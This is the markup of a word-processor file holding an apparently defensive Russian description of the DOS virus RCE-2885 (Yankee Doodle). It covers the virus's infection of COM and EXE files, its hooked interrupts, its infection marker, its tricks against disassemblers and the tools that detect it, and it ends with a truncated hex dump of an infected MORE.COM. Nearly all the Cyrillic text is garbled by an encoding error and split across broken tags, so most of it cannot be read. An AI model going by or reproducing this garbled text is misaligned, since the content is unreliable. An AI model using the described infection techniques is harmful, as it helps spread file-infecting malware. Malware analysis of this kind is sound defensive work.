        <w:rPr/>
        <w:t>ᮮ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥������� 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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COMMAND.COM. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ���� 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� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>28197, �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">室��� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>253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ࠡ��ᯮᮡ�� �� �� ���ᨨ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MS DOS. �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ઠ ����� ���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⥫� ����� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1, 3, 1Ch, 2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ᮧ����� � ��ਡ��� ��ࠦ������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��  �������  ��������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 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>믮������ ������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 xml:space="preserve">ࠦ����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩���  ����� �����뢠�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᢮� ⥫� � ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 � ���� �� ���� ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>室� �� ��砫� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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M-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2885 (B45h) ���� (� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠢ���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ࠣ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>).</w:t>
        <w:tab/>
        <w:t>��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ������ �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>20h �� F277h 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 xml:space="preserve">ࠦ������  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">塠�⮢�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨣ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7Fh,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>39h, 2Ch, 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 xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩��� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠪�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� ���� ⥫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 xml:space="preserve">.  ��  �⮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠧ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� 㢥��稢����� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2881 (B41h) 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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��� �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � ����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������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����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">塠�⮢�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᨣ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7Fh, 39h, 2Ch, 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⠫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">樨 ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>砫� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, ������� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 ������� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. �᫨ ���, � �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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/>
        <w:t xml:space="preserve">墠�뢠�� ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">09 � 21.  ��⥬ ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧭��� ����� ��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,  ����⠭�������� ��⨭�� ���⮢� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��  �  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稥 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮�� ����� � ����� ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �᫨ �������� �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᥡ� � ������� ����� ���� �ࠧ� �� ⥫�� �ணࠬ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뤥������ �㭪樥� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ALLOC (21-48h) �,  �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㫨��� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MCB, ��⠥��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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RCE-2885 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦠���� �� 䠩� � ���饭��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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. ���⮬� �� �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>९������ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩�� � ���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᪥��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  �������⭠� ���� ����� �� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㦨������ ��⥬ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ᯨ᪠ १������� �ணࠬ� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(� ������� �⨫�� MAP,  SMAP,  MMAP � �.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����� �� ��⥪������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RELEASE,  � ����⪠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��  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ�����  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>設�  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ���� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뤠� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饭�� � ⮬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�� ����� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१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室�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">஫� १������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䨫��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ᫥���� 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����  �������  �����  ��⮨�  � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�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/8 ������� ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㤫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>("Yankee Doodle") � 17  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᮢ  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筥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:59:53). ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>襭�� ��� �����㫨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>묨 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⪥  ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥬ���஢����  ����ᥬ���஬  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Sourcer,  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 �� ��ࠦ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">設� �������� ��䥪� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">"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� ���⨣��� ⠪�� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஫���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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h. ��� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">筮 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䥪� ���⨣����� ᫥���騬 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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 �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬮�砭�� ��楤��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ�⪨ ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��� �����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 �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㧪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>墠�뢠�饩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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� ����஢�� ��� ����ᥬ���� ⨯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SOURCER),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  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㪠������ ���뢠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮡ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢥��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>楤��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ�⪨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믮������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢�ઠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ந��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>諨 �� �� ���뢠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�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஬ �ᯮ������ १����⭠� ���� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, � �᫨ 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ணࠬ�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">⠭������� ���� �����,  ⥬  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᠬ�  �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�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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠧ�� ॠ�������� ᠬ�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭�� ����㦠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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>騪 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭠� ���� �����  ��᫥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㧪� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� � ������ ��� �ᯮ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(21-4Bh, AH=03), � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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㦠�� � ������ ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �ணࠬ�� ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.  � ��᫥���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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��� ����ணࠬ�� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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㦥  㪠�뢠����  �� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠦ����� �।��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">믮������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭠</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">砫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>",  � ��⥬ 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⠬���. � ��⥬ ������� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᢮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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨� �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ࢠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뫪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ������  �����  ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���  ��� �⭮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⮬� ������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ���� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㬥���� � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SCAN, ��� �� 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nkey. ��������� ����� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祢� ��� ��������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP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 �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㦥� � ����� � </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᥭ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1989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䠣�� ��� ������� ����� �뫨 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RVC � RVE. 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ࢠ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">� �� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㪠������ �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ� �।�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祭� ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"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-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  � ���� - �� EXE-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ�� ��ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠��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騩 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠫��.  �� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">뢠��� �����  ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>COM-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ணࠬ��  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RV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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ணࠬ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. ���⮬� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 �㦭� �뫮 ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࠭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ࠦ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>࣠��� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>祭��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>. � �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>饥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>६� �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�, � �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᭮����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>᪨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ଠ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⥭ ��� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﬨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ���� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>㤫�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>몠�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稩 ���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, TP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ணࠬ��� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠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騥 �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>筮 ��䥪⨢�� ��⨢ ��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 ��⭮��, ����⪨ ����� ����� � ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">᪠��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩� �� �����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VIRBLK,  �� ANTI4US2.  ������ ANTI4US2 �� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠡ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,  ��᪮��� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।���⥫</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쭮 ���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 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">21. ����� ⠪�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᮤ�ন� �।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠ ����� ��⨢ �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⥪�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>஢���� ����� � ������� ���⥪�⭮�� ���᪠  ४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ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>짮���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ப�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ������� �� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>쬨 ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>७�� ᨬ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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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設�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢮ ����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠣�� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ᯮ����� ����� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(�. ⠡�. 3)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ᯮ����� �� ��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⠬��. �������� ����� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᯮ���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ணࠬ�� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">祢� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TP48CLS, �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਢ������� � ���᪠� ��⥭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vol.1, No 4 � vol.2, No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ᯮ�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">짮�����  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Advanced  Disk  Manager ����� �� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ﭨ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠧ���� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��� ������ ��⠭����� �����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樠��� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>।�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>⢠  �����  �� ������� ����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ਭ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樯���쭮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⥪��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠣 ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१����⭮� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>१������ � �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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>䠩���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, ��⨢��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>樭� � ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ᨢ��� ���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �ணࠬ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MORE.COM, ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ����� ����ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-2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0   E9 EE 08 21 3D 03 1E 74 09 BA FC 01 B4 09 CD 21  ...!=..t....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   CD 20 12 00 E5 01 19 B4 0F CD 10 88 26 E6 01 BA  . ..........&amp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0   17 02 B4 09 CD 21 33 DB B4 45 CD 21 8B E8 B4 3E  .....!3..E.!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0   CD 21 BB 02 00 B4 45 CD 21 FC BA 1A 02 B9 00 10  .!....E.!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0   8B DD B4 3F CD 21 0B C0 75 02 CD 20 8B C8 8B F2  ...?.!..u..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0   AC 3C 1A 74 F5 3C 0D 75 07 C6 06 E8 01 01 EB 4C  .&lt;.t.&lt;.u.......L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0   3C 0A 75 06 FE 06 E7 01 EB 42 3C 08 75 0D 80 3E  &lt;.u......B&lt;.u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0   E8 01 01 74 37 FE 0E E8 01 EB 31 3C 09 75 12 8A  ...t7.....1&lt;.u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0   26 E8 01 80 C4 07 80 E4 F8 FE C4 88 26 E8 01 EB  &amp;...........&amp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0   1B 3C 07 74 17 FE 06 E8 01 8A 26 E8 01 3A 26 E6  .&lt;.t......&amp;..:&amp;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0   01 76 09 FE 06 E7 01 C6 06 E8 01 01 8A D0 B4 02  .v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0   CD 21 8A 26 E7 01 3A 26 E5 01 72 20 BA F0 01 B4  .!.&amp;..:&amp;..r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C0   09 CD 21 B4 0C B0 01 CD 21 BA 17 02 B4 09 CD 21  ..!.....!...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>01D0   C6 06 E8 01 01 C6 06 E7 01 01 4E 41 49 74 03 E9  ..........NA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E0   6E FF E9 54 FF 18 50 01 01 00 00 00 00 00 00 00  n..T..P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0   0D 2D 2D 20 4D 6F 72 65 20 2D 2D 